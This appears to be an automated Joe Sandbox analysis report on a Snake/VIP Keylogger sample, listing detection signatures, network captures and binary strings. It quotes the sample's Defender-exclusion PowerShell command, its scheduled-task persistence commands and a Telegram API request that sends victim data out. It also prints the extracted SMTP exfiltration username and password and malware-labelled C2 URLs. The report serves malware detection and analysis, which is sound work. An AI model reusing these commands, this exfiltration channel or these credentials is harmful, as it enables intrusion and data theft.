10.2.AcEnrS.exe.4087160.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
10.2.AcEnrS.exe.4087160.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.AcEnrS.exe.4087160.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.AcEnrS.exe.4087160.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2e88a:$a1: get_encryptedPassword 0x72caa:$a1: get_encryptedPassword 0xb6eca:$a1: get_encryptedPassword 0x2eba7:$a2: get_encryptedUsername 0x72fc7:$a2: get_encryptedUsername 0xb71e7:$a2: get_encryptedUsername 0x2e69a:$a3: get_timePasswordChanged 0x72aba:$a3: get_timePasswordChanged 0xb6cda:$a3: get_timePasswordChanged 0x2e7a3:$a4: get_passwordField 0x72bc3:$a4: get_passwordField 0xb6de3:$a4: get_passwordField 0x2e8a0:$a5: set_encryptedPassword 0x72cc0:$a5: set_encryptedPassword 0xb6ee0:$a5: set_encryptedPassword 0x2ff1f:$a7: get_logins 0x7433f:$a7: get_logins 0xb855f:$a7: get_logins 0x2fe82:$a10: KeyLoggerEventArgs 0x742a2:$a10: KeyLoggerEventArgs 0xb84c2:$a10: KeyLoggerEventArgs
10.2.AcEnrS.exe.4087160.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3c6b6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x80ad6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc4cf6:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3bd59:$a3: \Google\Chrome\User Data\Default\Login Data 0x80179:$a3: \Google\Chrome\User Data\Default\Login Data 0xc4399:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bfb6:$a4: \Orbitum\User Data\Default\Login Data 0x803d6:$a4: \Orbitum\User Data\Default\Login Data 0xc45f6:$a4: \Orbitum\User Data\Default\Login Data 0x3c995:$a5: \Kometa\User Data\Default\Login Data 0x80db5:$a5: \Kometa\User Data\Default\Login Data 0xc4fd5:$a5: \Kometa\User Data\Default\Login Data
10.2.AcEnrS.exe.4087160.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f49d:$s1: UnHook 0x738bd:$s1: UnHook 0xb7add:$s1: UnHook 0x2f4a4:$s2: SetHook 0x738c4:$s2: SetHook 0xb7ae4:$s2: SetHook 0x2f4ac:$s3: CallNextHook 0x738cc:$s3: CallNextHook 0xb7aec:$s3: CallNextHook 0x2f4b9:$s4: _hook 0x738d9:$s4: _hook 0xb7af9:$s4: _hook
Click to see the 54 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ParentImage: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe, ParentProcessId: 6600, ParentProcessName: WIpGif4IRrFfamQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ProcessId: 5052, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\AcEnrS.exe, ParentImage: C:\Users\user\AppData\Roaming\AcEnrS.exe, ParentProcessId: 7400, ParentProcessName: AcEnrS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp6B55.tmp", ProcessId: 7616, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 75.102.58.14, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe, Initiated: true, ProcessId: 7308, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49745

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ParentImage: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe, ParentProcessId: 6600, ParentProcessName: WIpGif4IRrFfamQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", ProcessId: 3180, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ParentImage: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe, ParentProcessId: 6600, ParentProcessName: WIpGif4IRrFfamQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ProcessId: 5052, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe", ParentImage: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe, ParentProcessId: 6600, ParentProcessName: WIpGif4IRrFfamQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AcEnrS" /XML "C:\Users\user\AppData\Local\Temp\tmp5423.tmp", ProcessId: 3180, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T10:55:04.725323+0200	2803305	3	Unknown Traffic	192.168.2.5	49711	188.114.97.3	443	TCP
2024-10-01T10:55:33.647819+0200	2803305	3	Unknown Traffic	192.168.2.5	49736	188.114.97.3	443	TCP
2024-10-01T10:55:36.431164+0200	2803305	3	Unknown Traffic	192.168.2.5	49743	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-01T10:55:00.305766+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	193.122.6.168	80	TCP
2024-10-01T10:55:04.199520+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	193.122.6.168	80	TCP
2024-10-01T10:55:16.227656+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49713	193.122.6.168	80	TCP
2024-10-01T10:55:24.758931+0200	2803274	2	Potentially Bad Traffic	192.168.2.5	49722	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 0000000A.00000002.2112989268.0000000004087000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "hnosgomezrecambios@pymetal.net", "Password": "21hnosgomezrecambios2021", "Host": "mail.pymetal.net", "Port": "587", "Version": "4.4"}
Source: 14.2.AcEnrS.exe.400000.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "hnosgomezrecambios@pymetal.net", "Password": "21hnosgomezrecambios2021", "Host": "mail.pymetal.net", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\AcEnrS.exe

ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: WIpGif4IRrFfamQ.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\AcEnrS.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: WIpGif4IRrFfamQ.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: WIpGif4IRrFfamQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49744 version: TLS 1.2

Source: WIpGif4IRrFfamQ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: System.pdbMZ@ source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: @o.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl=neutral source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: n(C:\Windows\UJLf.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb'Pw source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\UJLf.pdbSpyv source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\UJLf.pdbe source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: !!.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\UJLf.pdbpdbJLf.pdbN source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: UJLf.pdb?? source: AcEnrS.exe, 0000000E.00000002.2401454190.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: UJLf.pdb source: WIpGif4IRrFfamQ.exe, AcEnrS.exe.0.dr
Source:	Binary string: C:\Users\user\AppData\Roaming\AcEnrS.PDB source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: System.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: ?oC:\Users\user\AppData\Roaming\UJLf.pdby source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: UJLf.pdbSHA256 source: WIpGif4IRrFfamQ.exe, AcEnrS.exe.0.dr
Source:	Binary string: UJLf.pdbs\UJLf.pdbpdbJLf.pdbUJLf.pdb source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\UJLf.pdb<S%v source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\UJLf.pdbM source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, WER7D66.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb;( source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: mscorlib.ni.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\UJLf.pdbL source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\UJLf.pdb= source: AcEnrS.exe, 0000000E.00000002.2401002155.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: ysymbols\exe\UJLf.pdbow source: AcEnrS.exe, 0000000E.00000002.2400789050.0000000000797000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER7D66.tmp.dmp.18.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER7D66.tmp.dmp.18.dr

Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 07738B02h	0_2_07738237
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 013FF2EDh	9_2_013FF150
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 013FF2EDh	9_2_013FF33C
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 013FFAA9h	9_2_013FF804
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B60D0Dh	9_2_06B60B30
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B61697h	9_2_06B60B30
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B631E8h	9_2_06B62DD0
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B62C21h	9_2_06B62970
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B6F8C9h	9_2_06B6F620
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06B60673
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B6FD21h	9_2_06B6FA78
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B6DA61h	9_2_06B6D7B8
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B6D1B1h	9_2_06B6CF08
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B6D609h	9_2_06B6D360
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B6E769h	9_2_06B6E4C0
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B6DEB9h	9_2_06B6DC10
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B6E311h	9_2_06B6E068
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06B60853
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_06B60040
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B631E8h	9_2_06B62DCA
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B6F471h	9_2_06B6F1C8
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B631E8h	9_2_06B63116
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B6EBC1h	9_2_06B6E918
Source: C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe	Code function: 4x nop then jmp 06B6F019h	9_2_06B6ED70
Source: C:\Users\user\AppData\Roaming\AcEnrS.exe	Code function: 4x nop then jmp 090179AAh	10_2_090170DF

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 14.2.AcEnrS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4caa9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.40cb580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.WIpGif4IRrFfamQ.exe.4c665c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.AcEnrS.exe.4087160.0.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.5:49745 -> 75.102.58.14:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2002/10/2024%20/%2021:40:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	ASN Name: SERVERCENTRALUS SERVERCENTRALUS
Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49713 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49722 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49736 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49743 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 188.114.97.3:443

Source: global traffic

TCP traffic: 192.168.2.5:49745 -> 75.102.58.14:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:065367%0D%0ADate%20and%20Time:%2002/10/2024%20/%2021:40:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20065367%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
